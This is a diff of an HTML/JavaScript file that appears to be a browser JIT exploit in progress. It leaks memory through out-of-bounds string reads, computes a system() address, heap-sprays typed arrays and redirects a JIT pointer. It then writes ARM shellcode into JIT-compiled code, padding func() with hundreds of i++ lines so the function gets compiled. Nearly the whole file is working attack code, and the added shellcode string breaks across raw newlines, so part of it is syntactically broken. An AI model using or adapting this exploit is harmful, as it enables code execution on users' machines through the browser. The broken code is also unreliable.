--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start6");
+alert("start66");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -10,9 +10,7 @@ for(var i=0;i<0x1000;i++){
  }
 }
 
- function func(){
-  return 2
- }
+
  func();
  for (var i=0; i<0x1000; i++) {
   func()
@@ -152,7 +150,6 @@ var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 a=(vftable+0x6a30)/2;
 var mmap_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 var system_addr=mmap_addr-0x6eeac;
-alert(system_addr.toString(16));
 a=(func_addr+0x30)/2;
 var p_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 a=(p_addr+0x10)/2;
@@ -178,13 +175,16 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x04\xB0\x2D\xE5\x00\xB0\x8D\xE2\x1C\xD0\x4D\xE2\x18\x00\x0B\xE5\x1C\x10\x0B\xE5\x00\x30\xA0\xE3\x08\x30\x0B\xE5\x28\x40\x14\xE5\x06\x30\xA0\xE3\x03\x00\xA0\xE1\x00\xD0\x8B\xE2\x00\x08\xBD\xE8\x1E\xFF\x2F\xE1\x1E\xFF\x2F\xE1";
-
+var shellcode="\x04\xB0\x2D\xE5\x00\xB0\x8D\xE2\x1C\xD0\x4D\xE2\x18\x00\x0B\xE5
+\x1C\x10\x0B\xE5\x00\x30\xA0\xE3\x08\x30\x0B\xE5\x28\x40\x14\xE5
+\x06\x30\xA0\xE3\x03\x00\xA0\xE1\x00\xD0\x8B\xE2\x00\x08\xBD\xE8
+\x1E\xFF\x2F\xE1";
 for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=1;
 }
- alert(typedarray_index.toString(16))
+ spray[spray_index][typedarray_index+0x38/4]=p_addr+0x10-0x18;
+ myarr[0]=jitcode_addr;
 while(1){
 a=prompt("addr");
 b="";
@@ -209,6 +209,7 @@ b+=" ";
 b+=s1.charCodeAt(a+7).toString(16);      
 alert(b);
 }
+alert("to trigger");
 alert(func());
 while(1){
 a=prompt("addr");
@@ -236,4 +237,2056 @@ alert(b);
 }
 alert("end");
 }
+ function func(){
+  var i;
+  i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+i++;
+
+ }
 </script>
